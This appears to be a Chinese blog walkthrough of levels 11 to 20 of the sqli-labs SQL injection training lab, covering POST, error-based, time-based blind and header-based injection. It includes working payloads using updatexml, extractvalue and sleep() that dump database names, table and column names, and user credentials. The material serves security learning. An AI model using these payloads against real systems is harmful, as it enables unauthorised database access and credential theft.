sqlilabs第十一关到二十关

最新推荐文章于 2024-12-14 08:49:34 发布

原创最新推荐文章于 2024-12-14 08:49:34 发布 · 149 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#数据库

文章详细描述了从第十一到第二十关的Web应用程序安全测试过程，主要涉及SQL注入技术，包括字符型、闭合方式判断、报错注入、延时注入以及针对不同字段的探测方法，如数据库名、表名、列名和数据值。

第十一关

十一关之后就是post注入了，采用burp抓包进行修改

判断是字符型注入

其他的就和get注入一样，先进行字段猜解

查看回显位

查数据库名

查表名

查列名

数据值

第十二关

和十一关差不多，闭合方式有所不同，判断闭合

可能为")

查看字段数

查看数据库名称

查看表名

查看列名

查看数据值

第十三关

通过 1 or 1=1# 进行测试不是数字型

1' or'1='1 有报错，说明是字符型注入

判断注入符

没有回显，猜测可能是报错注入

爆出数据库名字

admin')and updatexml(1,concat(0x7e,(select database())),3)#

爆表名

1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

爆列名

1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))#

1' and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users)))#

第十四关

使用双引号对参数进行包装

直接上截图

第十五关

通过单引号注入，没有回显，也不能使用报错注入，应该就是ascii或者延时注入

这里使用的延时注入

正确了就正常返回，不正确就按照延时的时间进行返回

猜表名的第一个字符

admin'and if(ascii(substr(database(),1,1))=115,1,sleep(20))#

反正就是用延时注入进行爆库名，表名，列名，数据值

这里就不再一一例举了，和第八关一样

第十六关

使用双引号加括号进行注入，还是使用延时注入

admin")and If(ascii(substr(database(),1,1))=115,sleep(20),1)#，字母s的asciia码是115

爆表
第一个字符
admin' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(20),1)--+
爆长度和表名
uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(20),1)--+
爆值
uname=admin' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(20),1)--+
uname=admin' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(20),1)--+

第十七关

password reset 对密码进行修改

源码中对uname进行了长度的限制，还进行了对sql语句的过滤，对passwd进行注入

查看数据库名字，版本

uname=admin&passwd=1'and updatexml(1,concat(0x23,database(),0x23,version(),0x23,user()),1)#

D5y2MpsWaqHRAAAAAElFTkSuQmCC

报数据表

uname=admin&passwd=1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

爆列名

uname=admin&passwd=1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)#

报数据值

报错了，是因为在sql语句中不能先select这个表名,再update这个表

可以采用（select username from users)来代替

不过限制最长的字符是32个，使用mid函数进行查看，从第32位开始查看回显31位字符串，也就是mid(SQL语句,32,31)

uname=admin&passwd=1'and updatexml(1,concat(0x23,mid((select group_concat(username) from (select username from users)a),32,31)),1)#

第十八关

这里对用户名，和密码都做了过滤。不过user_agent 也可以验证身份

这一关再user-agent 进行报错注入

第十九关

referter注入

第二十关

cookie注入